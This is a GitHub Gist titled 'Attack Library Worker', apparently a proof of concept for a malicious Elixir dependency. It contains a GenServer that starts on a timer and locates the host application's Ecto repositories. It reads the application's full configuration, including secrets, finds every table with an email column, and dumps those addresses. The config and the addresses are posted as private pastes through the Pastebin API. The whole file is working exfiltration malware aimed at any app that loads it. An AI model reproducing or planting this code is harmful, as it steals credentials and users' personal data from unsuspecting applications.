Created
July 22, 2023 12:06
-
-
Save PJUllrich/5643794e3f1fd25ba0feb45ad6014a68 to your computer and use it in GitHub Desktop.
Attack Library Worker
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
defmodule Attack.Worker do | |
use GenServer | |
require Logger | |
def start_link(init_args) do | |
GenServer.start_link(__MODULE__, [init_args]) | |
end | |
def init(_args) do | |
schedule_attack() | |
{:ok, :initial_state} | |
end | |
defp schedule_attack() do | |
Process.send_after(self(), :attack, 1_000) | |
end | |
def handle_info(:attack, state) do | |
repos = apply(Ecto.Repo, :all_running, []) | |
Enum.each(repos, &steal_config/1) | |
Enum.each(repos, &steal_emails/1) | |
{:noreply, state} | |
end | |
defp steal_config(repo) do | |
app = Application.get_application(repo) | |
config = Application.get_all_env(app) | |
send_secret(config) | |
end | |
defp steal_emails(repo) do | |
tables = get_tables_with_emails(repo) | |
Enum.each(tables, fn table -> do_steal_emails(repo, table) end) | |
end | |
defp get_tables_with_emails(repo) do | |
query = """ | |
SELECT table_name | |
FROM information_schema.columns | |
WHERE column_name in ('email', 'emails'); | |
""" | |
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query]) | |
List.flatten(result.rows) | |
end | |
defp do_steal_emails(repo, table) do | |
query = "SELECT email FROM #{table}" | |
{:ok, result} = apply(Ecto.Adapters.SQL, :query, [repo, query]) | |
emails = List.flatten(result.rows) | |
send_secret(emails) | |
end | |
defp send_secret(secret) do | |
:inets.start() | |
url = "https://pastebin.com/api/api_post.php" | |
payload = | |
"api_dev_key=MYAPIKEY&api_option=paste&api_paste_private=2&api_user_key=MYUSERKEY&api_paste_code=#{inspect(secret)}" | |
:httpc.request(:post, {url, [], ~c"application/x-www-form-urlencoded", payload}, [], []) | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment